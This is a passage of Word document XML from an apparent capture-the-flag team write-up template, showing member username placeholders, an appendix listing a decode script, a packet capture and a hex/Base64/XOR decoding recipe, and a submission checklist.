            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>[fill in CTFd username]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="1"/>
          <w:trHeight w:val="60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A2">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Member 2</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A3">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>[fill in]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A4">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>[fill in CTFd username]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="1"/>
          <w:trHeight w:val="60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A5">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:color w:val="111111"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Member 3</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A6">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>[fill in]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A7">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>[fill in CTFd username]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:color="ea1d32" w:space="4" w:sz="8" w:val="single"/>
        </w:pBdr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A9">
      <w:pPr>
        <w:spacing w:after="160" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="6b6b6b"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Optional: full scripts, long logs, repository links and references.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table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946"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="3800"/>
            <w:gridCol w:w="5946"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="0"/>
          <w:tblHeader w:val="1"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AA">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Item</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AB">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Link or file</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>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AC">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:t>solve_challenge2.py (full decode script, Challenge 6)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>Attached alongside this writeup</w:t>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AE">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>challenge2.pcap (provided capture)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AF">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>Supplied by organisers</w:t>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B0">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>Decode chain cross-check</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B1">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t>CyberChef recipe: From Hex, From Base64, XOR key 42 (hex)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="1"/>
          <w:trHeight w:val="460" w:hRule="atLeast"/>
          <w:tblHeader w:val="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcMar>
              <w:top w:w="90.0" w:type="dxa"/>
              <w:left w:w="130.0" w:type="dxa"/>
              <w:bottom w:w="90.0" w:type="dxa"/>
              <w:right w:w="130.0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B2">
            <w:pPr>
              <w:rPr/>
            </w:pP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B3">
            <w:pPr>
              <w:rPr/>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B4">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:color="ea1d32" w:space="4" w:sz="8" w:val="single"/>
        </w:pBdr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Before you submit</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">
      <w:pPr>
        <w:spacing w:after="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  The team name matches CTFd exactly.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">
      <w:pPr>
        <w:spacing w:after="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  Every member has entered their CTFd username in the declaration.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B7">
      <w:pPr>
        <w:spacing w:after="100" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">☐</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">  The file is a PDF named &lt;TeamName&gt;_writeups.pdf.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference r:id="rId7" w:type="default"/>
      <w:pgSz w:h="16838" w:w="11906" w:orient="portrait"/>
      <w:pgMar w:bottom="1080" w:top="1080" w:left="1080" w:right="1080" w:header="560" w:footer="5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4762500" cy="4667250"/>
          <wp:effectExtent b="0" l="0" r="0" t="0"/>
          <wp:wrapNone/>
          <wp:docPr descr="CryoVault 2026 logo watermark" id="1" name="image2.png"/>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
              <pic:pic>
                <pic:nvPicPr>
                  <pic:cNvPr descr="CryoVault 2026 logo watermark" id="0" name="image2.png"/>
                  <pic:cNvPicPr preferRelativeResize="0"/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId1"/>
                  <a:srcRect b="0" l="0" r="0" t="0"/>
                  <a:stretch>
                    <a:fillRect/>
                  </a:stretch>
                </pic:blipFill>
                <pic:spPr>
                  <a:xfrm>
                    <a:off x="0" y="0"/>
                    <a:ext cx="4762500" cy="46672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color w:val="ea1d3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11111"/>
        <w:sz w:val="21"/>
        <w:szCs w:val="21"/>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40" w:before="320" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:color w:val="111111"/>
      <w:sz w:val="28"/>
      <w:szCs w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:pPr>
      <w:keepNext w:val="1"/>
      <w:spacing w:after="120" w:before="0" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:color w:val="111111"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>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